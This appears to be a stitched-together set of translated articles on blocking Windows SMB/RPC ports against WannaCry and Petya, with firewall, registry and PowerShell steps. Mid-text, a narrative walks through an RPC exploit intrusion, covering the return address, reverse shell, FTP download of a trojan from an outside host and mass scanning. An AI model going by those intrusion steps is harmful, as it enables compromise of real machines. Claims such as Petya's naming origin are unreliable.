Yesterday, unknown attackers staged another massive attack using a ransomware virus. Experts say dozens of large companies in Ukraine and Russia were affected. The ransomware is called Petya.A (probably named after Petro Poroshenko). It is reported that if you create a file named perfc (without an extension) in C:\Windows\, the virus will skip your machine. If your computer has rebooted and started "checking the disk", turn it off immediately; booting from a LiveCD or USB will then give you access to the files. Another way to protect yourself is to close ports 1024-1035, 135 and 445. Below we show how to do this, using Windows 10 as the example.

Step 1
Open Windows Firewall (preferably in its advanced security mode) and choose "Advanced settings".
Select the "Inbound Rules" tab, then the "New Rule" action (in the right-hand column).

Step 2
Select the rule type "Port". In the next window select "TCP" and enter the ports you want to close. In our case: 135, 445, 1024-1035 (without quotes).

Step 3
Select "Block the connection"; in the next window tick all three profiles: Domain, Private, Public.

Step 4
All that remains is to name the rule (so it is easy to find later). You can also give the rule a description.

If some programs stop working or start behaving incorrectly, you may have closed a port they use. You will need to add a firewall exception for them.

TCP port 135 is used by remote services (DHCP, DNS, WINS, etc.) and by Microsoft client-server applications (e.g. Exchange).

TCP port 445 is used in Microsoft Windows 2000 and later for direct hosting of SMB over TCP/IP, without NetBIOS (for example, by Active Directory).


The WannaCry virus, also known as WannaCrypt or Wanna Decryptor, hit the online world in May 2017. The malware spread through local networks, infecting one computer after another, encrypted the files on disk and demanded that the user pay the extortionists $300 to $600 to unlock them. The Petya virus, which gained almost political notoriety in the summer of 2017, acted in a similar way.

Both network pests entered the victim's operating system through the same door: network ports 445 and 139. After these two large outbreaks, smaller kinds of malware began to exploit the same route. So what are these ports that everyone who is not too lazy keeps scanning?

What are ports 445 and 139 responsible for in Windows

Windows uses these ports to share files and printers. The first carries the Server Message Block (SMB) protocol, the second carries NetBIOS (Network Basic Input/Output System). Both protocols let Windows computers connect over the network to "shared" folders and printers on top of the underlying TCP and UDP protocols.

Starting with Windows 2000, file and printer sharing over the network is done mainly through port 445 using the SMB application protocol. Earlier versions of the system used NetBIOS over ports 137, 138 and 139, and later versions have kept this feature as a legacy.

Why open ports are dangerous

Ports 445 and 139 are a subtle but significant weak point in Windows. Leaving them unsecured opens the door to your hard drive for uninvited guests such as viruses, trojans and worms, as well as for hacker attacks. And if your computer is on a local network, all of its users are at risk of infection.

In effect you are sharing your hard drive with anyone who can reach these ports. Given the desire and the skill, attackers can view the contents of the drive, delete data, format the disk or encrypt files. That is exactly what the WannaCry and Petya viruses did during the epidemic that swept the world this summer.

So if you care about the security of your data, it is worth learning how to close ports 139 and 445 in Windows.

Finding out if ports are open

In most cases port 445 is open in Windows because file and printer sharing is enabled automatically when Windows is installed. This is easy to check on your machine. Press Win+R to open the Run dialog and enter cmd to start the command prompt. At the prompt, type netstat -na and press Enter. This command lists all active network ports with their status and the current incoming connections.

After a few seconds the port table appears. Near the top you will see the local address with port 445 (for example 0.0.0.0:445). If the status in the last column is LISTENING, the port is open. In the same way you can find port 139 in the table and check its status.
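The same check done from PowerShell, as an added example that is not part of the original article: it lists the sockets that netstat reports as LISTENING on the ports discussed here (IPv4 and IPv6), the process that owns each one, and the enabled inbound firewall rules whose port filter covers those ports. It assumes Windows 8 / Server 2012 or later (NetTCPIP and NetSecurity modules); the function names are my own.

```powershell
# Added example, not from the original article. Run elevated so the owning
# process of system sockets (svchost.exe, System) is visible.

function Resolve-Owner([int]$ProcessId) {
    # Maps a socket's owning PID to a process name; empty if the PID is unknown.
    if ($ProcessId -gt 0) { (Get-Process -Id $ProcessId -ErrorAction SilentlyContinue).ProcessName }
}

function Get-PortExposure {
    param(
        [int[]]$TcpPorts = @(135, 139, 445),   # RPC endpoint mapper, NetBIOS session, SMB
        [int[]]$UdpPorts = @(137, 138)         # NetBIOS name and datagram services
    )

    # 1. Sockets in Listen state: this is what "netstat -na" reports as LISTENING.
    #    LocalAddress 0.0.0.0 or :: means the socket is bound on every interface.
    $listeners = @(Get-NetTCPConnection -State Listen |
        Where-Object { $TcpPorts -contains $_.LocalPort } |
        ForEach-Object {
            [pscustomobject]@{
                Proto = 'TCP'; Port = $_.LocalPort; Address = $_.LocalAddress
                PID = $_.OwningProcess; Process = Resolve-Owner $_.OwningProcess
            }
        })
    $listeners += @(Get-NetUDPEndpoint |
        Where-Object { $UdpPorts -contains $_.LocalPort } |
        ForEach-Object {
            [pscustomobject]@{
                Proto = 'UDP'; Port = $_.LocalPort; Address = $_.LocalAddress
                PID = $_.OwningProcess; Process = Resolve-Owner $_.OwningProcess
            }
        })

    # 2. A listening socket is only reachable if no enabled inbound rule blocks it,
    #    so collect the enabled inbound rules whose port filter covers these ports.
    #    Ranges such as "1024-1035" are not expanded here: only exact ports and "Any" match.
    $all = $TcpPorts + $UdpPorts
    $rules = Get-NetFirewallPortFilter |
        Where-Object {
            $f = $_
            ($f.Protocol -eq 'TCP' -or $f.Protocol -eq 'UDP') -and
            ($f.LocalPort -eq 'Any' -or (@($f.LocalPort) | Where-Object { $all -contains $_ }))
        } |
        Get-NetFirewallRule |
        Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' } |
        Select-Object DisplayName, Action, Profile

    [pscustomobject]@{ Listeners = $listeners; InboundRules = @($rules) }
}

$report = Get-PortExposure
Write-Host 'Listening sockets:';               $report.Listeners    | Format-Table -AutoSize
Write-Host 'Enabled inbound rules on them:';   $report.InboundRules | Format-Table -AutoSize
```

A socket shown here as listening is not necessarily reachable from the network: an enabled Block rule in the second table, or a missing Allow rule, stops outside connections even though the socket stays open.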

How to close ports in Windows 10/8/7

There are three main ways to close port 445 in Windows 10, 7 or 8. They differ little between versions of the system and are quite simple; try whichever you prefer. Port 139 can be closed in the same way.

Close ports through firewall

The first method of closing port 445 in Windows is the simplest and is available to almost any user.

  1. Go to Start > Control Panel > Windows Firewall and click the Advanced settings link.
  2. Click Inbound Rules > New Rule. In the window that appears select Port > Next > TCP > Specific local ports, enter 445 in the field and click Next.
  3. Select Block the connection and click Next again. Tick all three profile checkboxes and click Next. Give the new rule a name and, optionally, a description, and click Finish.

Incoming connections to port 445 are now blocked. If necessary, create a similar rule for port 139.

Closing ports via command line

The second method uses the command line and is better suited to advanced Windows users.

  1. Click Start, type cmd in the search box at the bottom of the menu, right-click cmd in the list and choose Run as administrator.
  2. Paste the command netsh advfirewall set allprofile state on into the command window and press Enter.
  3. Then paste the following command: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445" and press Enter again.

This procedure also creates a Windows Firewall rule that closes port 445. Some users, however, report that this method does not work on their machines: when they check, the port still shows the LISTENING status. In that case, try the third method, which is also quite simple.
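The same rules created from PowerShell instead of netsh, as an added example that is not code from the original article. It uses the NetSecurity cmdlets (Windows 8 / Server 2012 and later, elevated prompt), covers the other ports the article mentions as well as 445, uses UDP for the two NetBIOS services that are UDP, and includes the reverse operation for reopening the ports later; the rule names and function names are my own.

```powershell
# Added example, not from the original article. Run in an elevated PowerShell.

$BlockRules = @(
    @{ Name = 'Block_TCP-135'; Protocol = 'TCP'; Port = 135 },   # RPC endpoint mapper
    @{ Name = 'Block_UDP-137'; Protocol = 'UDP'; Port = 137 },   # NetBIOS name service (UDP)
    @{ Name = 'Block_UDP-138'; Protocol = 'UDP'; Port = 138 },   # NetBIOS datagram service (UDP)
    @{ Name = 'Block_TCP-139'; Protocol = 'TCP'; Port = 139 },   # NetBIOS session service
    @{ Name = 'Block_TCP-445'; Protocol = 'TCP'; Port = 445 }    # SMB direct hosting
)

function Add-BlockRules {
    # Equivalent of "netsh advfirewall set allprofile state on": firewall on for every profile.
    Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True
    foreach ($r in $BlockRules) {
        # Idempotent: a rule with the same internal name is left alone.
        if (Get-NetFirewallRule -Name $r.Name -ErrorAction SilentlyContinue) { continue }
        # -Profile Any covers Domain, Private and Public, like the three checkboxes in the GUI.
        New-NetFirewallRule -Name $r.Name -DisplayName $r.Name `
            -Direction Inbound -Action Block -Enabled True `
            -Protocol $r.Protocol -LocalPort $r.Port -Profile Any | Out-Null
    }
}

function Test-BlockRules {
    # One row per expected rule: Ok is true only if it exists, is enabled, and blocks the right port.
    foreach ($r in $BlockRules) {
        $rule   = Get-NetFirewallRule -Name $r.Name -ErrorAction SilentlyContinue
        $filter = if ($rule) { $rule | Get-NetFirewallPortFilter }
        [pscustomobject]@{
            Rule = $r.Name
            Ok   = [bool]($rule -and $rule.Enabled -eq 'True' -and $rule.Action -eq 'Block' -and
                          $filter.Protocol -eq $r.Protocol -and
                          [string]$filter.LocalPort -eq [string]$r.Port)
        }
    }
}

function Remove-BlockRules {
    # The "open the ports again later" step: deletes only the rules this script created.
    foreach ($r in $BlockRules) {
        Get-NetFirewallRule -Name $r.Name -ErrorAction SilentlyContinue | Remove-NetFirewallRule
    }
}

Add-BlockRules
Test-BlockRules | Format-Table -AutoSize
```

A block rule does not stop the Server service from listening, so netstat -na will still show 0.0.0.0:445 LISTENING afterwards; what the rule changes is that remote hosts can no longer connect, so verify with Test-BlockRules or with a port scan from another machine rather than with netstat.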

Closing ports through the Windows registry

You can also block connections to port 445 by editing the system registry. Use this method with care: the Windows registry is the central database of the whole system, and an accidental mistake can have unpredictable consequences. Back up the registry before working on it, for example with the CCleaner program.

  1. Click Start, type regedit in the search box and press Enter.
  2. In the registry tree, go to the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
  3. A list of values is shown on the right side of the window. Right-click an empty area of the list and select New. From the menu, select DWORD (32-bit) Value or the 64-bit value, depending on your system type (32-bit or 64-bit).
  4. Rename the new value to SMBDeviceEnabled, then double-click it. In the Edit Value window, replace 1 with 0 in the Value data field and click OK to confirm.

This method is the most effective if you follow the steps above exactly. Note that it applies only to port 445.

For more effective protection, after making the registry change you can also disable the Windows Server service. To do so:

  1. Click Start, type services.msc in the search box and press Enter. The list of Windows system services opens.
  2. Find the Server service and double-click it. It is usually somewhere in the middle of the list.
  3. In the window that appears, select Disabled in the Startup type drop-down list and click OK.
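The registry change and the service change from the two procedures above, done from an elevated PowerShell with a matching revert, as an added example that is not from the original article. SMBDeviceEnabled under NetBT\Parameters and LanmanServer (the internal name of the Server service) are Windows' own names; the function names are mine.

```powershell
# Added example, not from the original article. Run in an elevated PowerShell.

$NetBT = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'

function Disable-DirectSmb {
    # SMBDeviceEnabled=0 stops the NetBT driver from offering SMB on TCP port 445.
    # The value is a DWORD on both 32-bit and 64-bit Windows; -Force overwrites an existing one.
    New-ItemProperty -Path $NetBT -Name SMBDeviceEnabled -PropertyType DWord -Value 0 -Force | Out-Null
    # Also stop and disable the Server service so nothing serves file shares at all.
    Stop-Service -Name LanmanServer -Force -ErrorAction SilentlyContinue
    Set-Service  -Name LanmanServer -StartupType Disabled
}

function Enable-DirectSmb {
    # The reverse: value back to 1 and the service back to Automatic, as the article describes.
    Set-ItemProperty -Path $NetBT -Name SMBDeviceEnabled -Value 1 -Type DWord
    Set-Service   -Name LanmanServer -StartupType Automatic
    Start-Service -Name LanmanServer
}

function Get-DirectSmbState {
    # Shows the current registry value and service state so the change can be confirmed.
    $v   = (Get-ItemProperty -Path $NetBT -Name SMBDeviceEnabled -ErrorAction SilentlyContinue).SMBDeviceEnabled
    $svc = Get-Service -Name LanmanServer
    [pscustomobject]@{
        SMBDeviceEnabled = if ($null -eq $v) { 'absent (behaves as 1)' } else { $v }
        ServerService    = $svc.Status
        StartupType      = $svc.StartType     # available on service objects in PowerShell 5 and later
    }
}

Get-DirectSmbState
```

The service change takes effect immediately; the SMBDeviceEnabled change is read by the NetBT driver at startup, so reboot for it to apply.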

The methods above (except the third one) let you close not only port 445 but also ports 135, 137, 138 and 139: when following the procedure, simply substitute the port number you need.

If you later need to open the ports again, simply delete the rule you created in Windows Firewall, or change the value you created in the registry from 0 back to 1 and then re-enable the Windows Server service by choosing Automatic instead of Disabled in the Startup type list.

Important! Remember that port 445 in Windows is responsible for sharing files, folders and printers. So once you close this port you can no longer share a folder with other users or print a document over the network.

If your computer is on a local network and you need these functions, use third-party security tools instead: for example, enable your antivirus product's firewall, which will take control of all ports and monitor them for unauthorized access.

By following the recommendations above you can protect yourself from a subtle but serious weak point in Windows and protect your data from the many kinds of malware that enter the system through ports 139 and 445.

The vulnerability was really terrifying, but a ready-made exploit turned out to be unavailable to the bulk of people... That is probably why nobody was afraid...

A group of Polish computer security experts, "Last Stage of Delirium", told the public about a vulnerability they had found in the handling of DCOM objects in the context of the RPC protocol. It was something amazing, because this protocol is used by almost every version of Windows in existence. Windows NT, Windows XP and Windows 2000 turned out to be vulnerable, and even Windows Server 2003 was affected. This was more than enough to take over most users' computers on the Internet. Moreover, many servers did not block incoming packets on port 135, which was exactly the port used for the attack, and that made them potential victims.

But a few hours later Todd Sabin reported that all RPC services were vulnerable. This meant that configuring the firewall to block port 135 was not a sufficient protection. Computers with open ports 135 (UDP/TCP), 139, 445 and 593 were exposed to danger. The media covered the bug as a potential security risk for Windows users. The matter was heading towards a global disaster. But since no exploit had been released to the public, everyone carried on with their old lives without thinking about the consequences of one appearing in the masses.

But not everyone reacted so passively to the appearance of this vulnerability. Hackers gradually began writing private exploits, and script kiddies kept waiting for one to appear. The result did not take long. Within a few days there were developments in this area and the first exploits appeared. Nevertheless, most of them merely crashed the remote system, which is explained by the fact that the technical details of the vulnerability were not yet known. Some OS versions, however, were already being exploited successfully.

That day was a turning point in the history of exploiting this vulnerability. A technical description of the problem finally appeared. After that a large number of exploits for different versions of Windows were born. Some of them even had a graphical interface, and sometimes a function for scanning a given range of IP addresses.

It was at this moment that the massive attack by hackers on ordinary users began. On top of that, the MS Blast Internet worm appeared, which easily penetrated computers connected to the Internet and even the corporate networks of the world's largest companies. Everyone was in danger...

Attacking a remote machine no longer took much effort, so the script kiddies got down to business. Theft of credit cards and of private exploits increased several times over, and many tasty segments of the network became easy pickings. That is what one hacker did. He had long wanted to take over a certain server, but until then he had had no decent vulnerability for it. He simply could not pass up this gift of fate.

A play in three acts

The first thing he had to do before the attack was to check which operating system was installed on the server. For this he used the nmap utility. Its capabilities have been written about many times, but I will repeat that it is used to determine the OS version of a remote computer. Conveniently, it exists for both Windows and *nix. Since the hacker used Windows for his work, his choice fell on the graphical version of nmap.

A few minutes of scanning and the result was positive: port 135 turned out to be open and not protected by a firewall. This was the beginning of the end, the beginning of the long-awaited attack. By that point many exploits had already been written, including "RCP Exploit GUI #2". Its distinguishing feature was that it had a graphical interface and contained built-in functions for scanning an IP range, as well as an FTP server.

Running the exploit, he entered the address of the target computer. But Windows NT was not in the exploit's list of attackable OS versions, and that was what the server ran. This was a serious problem, because to run the exploit you need to know the exact address in memory to which control is later transferred. After digging through the files that came with the exploit, he found a small list of addresses for a wide range of the Windows line. Among them was Windows NT with Service Pack 4. It was this value that he entered as the return address, ignoring the manual OS selection. The number 0xE527F377 became his secret pass into the life of the server. And he began the attack.

The system gave up without incident, and the hacker got a reverse shell from the remote server. Now that he could run anything on it, it was time to install a Trojan. Of the many available, DonaldDick was chosen. To carry out his plan he needed free hosting with FTP support. BY.RU fit perfectly, and that is where he uploaded the Trojan's server component. Now that DonaldDick was available via FTP, he turned to the victim, or rather began uploading the Trojan server onto it. It was a well-thought-out plan, because the vulnerability could be patched at any time, whereas a Trojan is a Trojan anywhere. Typing in the ftp console, he began uploading the file. The whole process took him just five lines:

open by.ru
server_name.by.ru
password
get fooware.exe
bye

where fooware.exe is the renamed DonaldDick server. Once the file had downloaded, all he had to do was run it. For this he simply typed the file name (fooware.exe) and pressed Enter with pleasure... After that the hacker had convenient control over the server.

But you know how it always is: when you find something interesting, you keep playing with it. So our hacker wanted more than one system. Seeing that the exploit allowed mass scanning, he set to work, or rather KaHt took over the job. Using it turned out not to be difficult. For example, to scan the network 192.168.0.* (class C), you had to type "KaHt.exe 129.168.0.1 192.168.0.254". That is what he did, then periodically checked the results. In this way he gained access to even more users, from whom he later obtained passwords for various services, mail and much other useful information. Not to mention that he began using many of them as anonymous proxies.

Food for thought

Although Microsoft released a patch long ago, users and admins are in no hurry to install patches, hoping that nobody will be interested in their network. But there are a great many such hackers, and installing the patch is more a necessity than an option. You can also block all incoming packets on ports 135, 139, 445 and 593.

Naturally, the hacker did all of this through an anonymous proxy and afterwards cleaned up the traces of his presence in the system. But you should think before repeating his exploits. After all, such actions are illegal and may end deplorably enough for you...

Blood, the fact that your firewall shows svchost.exe listening on this port does not mean it is open for connections from outside.

The rules seem to be written and should work.

Have you tried port scanners? - TsOB (Center for Security Provision) (clause 2.7)

And do not forget that IPv6 will also need to be checked, because it is enabled in your system, but scanners usually check only IPv4 (I'm talking about the centralized services).

If you do not need this protocol at all, you can disable it:

To disable IP version 6 components in Windows Vista, follow the steps below.

1. Click the Start button, type regedit in the Start Search box, then select regedit.exe from the Programs list.

2. In the User Account Control dialog box, click Continue.

3. Locate and select the following registry subkey:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

4. Double-click DisabledComponents to change the DisabledComponents setting.

   Note. If the DisabledComponents value is not present, it must be created. To do this:
   1. On the Edit menu, select New, and then DWORD (32-bit) Value.
   2. Type DisabledComponents and press ENTER.
   3. Double-click DisabledComponents.

5. Enter one of the following values to configure IP version 6, and then click OK.
   1. Enter 0 to enable all IP version 6 components. Note: the value "0" is the default.
   2. Enter 0xffffffff to disable all IP version 6 components except the loopback interface. With this value, Windows Vista will also use IP version 4 in prefix policies instead of IPv6.
   3. Enter 0x20 to use the IP version 4 prefix in policies instead of IP version 6.
   4. Enter 0x10 to disable IP version 6 native interfaces.
   5. Enter 0x01 to disable all IP version 6 tunnel interfaces.
   6. Enter 0x11 to disable all IP version 6 interfaces except the loopback interface.

Notes

* Using values other than 0x0 or 0x20 may cause the Routing and Remote Access service to fail.
* You must restart your computer for the changes to take effect.
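The DisabledComponents value handled from PowerShell, as an added example that is not part of the KB text: it reads the value, decodes it into the component flags listed above, writes a new value, and removes it again. The key and value name are the ones from the article and the bit meanings follow the list above; the function names are mine. Run elevated and reboot afterwards, as the note says.

```powershell
# Added example, not from the original article. Run in an elevated PowerShell.

$Tcpip6 = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters'

function Get-IPv6DisabledComponents {
    # Reads DisabledComponents and decodes the bits documented in the KB list above.
    $raw = (Get-ItemProperty -Path $Tcpip6 -Name DisabledComponents -ErrorAction SilentlyContinue).DisabledComponents
    if ($null -eq $raw) { $raw = 0 }               # absent = 0 = every IPv6 component enabled
    $flags = [int64]$raw -band 0xFFFFFFFF          # the DWORD comes back as a signed Int32; view it unsigned
    [pscustomobject]@{
        Value                = ('0x{0:X8}' -f $flags)
        PreferIPv4InPolicies = [bool]($flags -band 0x20)    # 0x20: IPv4 preferred in prefix policies
        NativeIfDisabled     = [bool]($flags -band 0x10)    # 0x10: native IPv6 interfaces disabled
        TunnelIfDisabled     = [bool]($flags -band 0x01)    # 0x01: tunnel interfaces disabled
        AllDisabled          = ($flags -eq 0xFFFFFFFF)      # everything except loopback disabled
        RRASWarning          = ($flags -ne 0 -and $flags -ne 0x20)   # per the note: RRAS may fail
    }
}

function Set-IPv6DisabledComponents {
    param([Parameter(Mandatory)][uint32]$Value)    # e.g. 0x20, 0x11 or 0xFFFFFFFF from the list above
    # Registry DWORDs are written as Int32, so values above 0x7FFFFFFF are stored in their signed form.
    $signed = [BitConverter]::ToInt32([BitConverter]::GetBytes($Value), 0)
    New-ItemProperty -Path $Tcpip6 -Name DisabledComponents -PropertyType DWord -Value $signed -Force | Out-Null
}

function Reset-IPv6DisabledComponents {
    # Back to the default: removing the value is equivalent to 0 (all components enabled).
    Remove-ItemProperty -Path $Tcpip6 -Name DisabledComponents -ErrorAction SilentlyContinue
}

Get-IPv6DisabledComponents
```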

The information in this article applies to the following products:

* Windows Vista: Enterprise, Enterprise 64-bit edition, Home Basic, Home Basic 64-bit edition, Home Premium, Home Premium 64-bit edition, Ultimate, Ultimate 64-bit edition, Business, Business 64-bit edition, Starter
* Windows 7: Enterprise, Home Basic, Home Premium, Professional, Ultimate
* Windows Server 2008 R2: Datacenter, Enterprise, Standard
* Windows Server 2008: Datacenter, Enterprise, Standard

Source - http://support.microsoft.com/kb/929852

After disabling it and rebooting, a bunch of extra lines will disappear from the output of ipconfig /all, and only the interfaces you know well will remain.

To re-enable it, simply delete the created value from the registry or set it back to "0", and then reboot.

Every day PC owners face a huge number of dangerous programs and viruses that one way or another get onto the hard drive and cause leaks of important data, computer breakdowns, theft of important information and other unpleasant situations.

Most often it is computers running Windows, whatever the version (7, 8, 10 or another), that get infected. The main reason for this is incoming connections to the PC, or "ports", which are the weak point of any system because they are available by default.

The word "port" is a term meaning the number of an incoming connection directed to your PC from external software. It often happens that viruses use these ports to penetrate your computer easily over an IP network.

Once malicious software enters the computer through such incoming connections, it quickly infects all important files, not only user files but system files too. To avoid this we recommend closing all the standard ports that can become your weak spot in a hacker attack.

Which ports are the most vulnerable in Windows 7-10?

Numerous studies and expert surveys show that up to 80% of malicious attacks and hacks used the four main ports that different versions of Windows use for quick file exchange:

  • TCP port 139, required for remote connection and PC control;
  • TCP port 135, intended for executing commands;
  • TCP port 445, for fast file transfer;
  • UDP port 137, through which a quick search for the PC is carried out.

Close ports 135-139 and 445 in Windows

We invite you to look at the simplest ways to close Windows ports, which require no extra knowledge or professional skills.

Using the command line

The Windows command line is a software shell used to set functions and parameters for software that has no graphical interface of its own.

To open the command line:

  1. Press the key combination Win + R
  2. In the Run dialog that appears, enter cmd
  3. Click the "OK" button

A working window with a black background will appear, in which you enter the following commands one by one. After each line, press Enter to confirm.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block1_TCP-135" (closes TCP port 135)
netsh advfirewall firewall add rule dir=in action=block protocol=udp localport=137 name="Block1_UDP-137" (closes UDP port 137; the NetBIOS name service is UDP)
netsh advfirewall firewall add rule dir=in action=block protocol=udp localport=138 name="Block1_UDP-138" (closes UDP port 138; the NetBIOS datagram service is UDP)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139" (closes TCP port 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445" (closes TCP port 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000" (closes TCP port 5000)

These six commands close the four vulnerable Windows ports listed above (open by default: TCP 135, 139, 445 and UDP 137), UDP port 138, and port 5000, which is responsible for displaying the list of available services.

We close ports with third-party programs

If you do not want to spend time on the command line, take a look at third-party applications. Such software edits the registry automatically through a graphical interface, without the need to type commands manually.

According to our users, the most popular program for this purpose is Windows Doors Cleaner. It lets you easily close ports on a computer running Windows 7/8/8.1/10. Older versions of the operating system are unfortunately not supported.

How to work with a program that closes ports

To use Windows Doors Cleaner you must:

1. Download the software and install it
2. Run the program by right-clicking its shortcut and selecting "Run as administrator"
3. The working window that appears lists the ports, with "Close" or "Disable" buttons that close the vulnerable Windows ports, as well as any others you wish
4. After making the necessary changes, reboot the system

Another advantage of the program is that it can not only close ports but open them as well.

Drawing conclusions

Closing vulnerable network ports in Windows is not a cure for all ills. Remember that network security is only achieved by comprehensive measures aimed at closing all the weak points of your PC.

For a Windows user's safety it is mandatory to install critical updates from Microsoft, to have licensed antivirus software and an enabled firewall, to use only trusted software, and to read our articles regularly, in which we cover all the existing ways to keep your data anonymous and secure.

Do you know better ways to close network ports? Share your knowledge in the comments, and do not forget to repost the article to your page. Share useful information with your friends and do not give hackers a chance to harm your loved ones!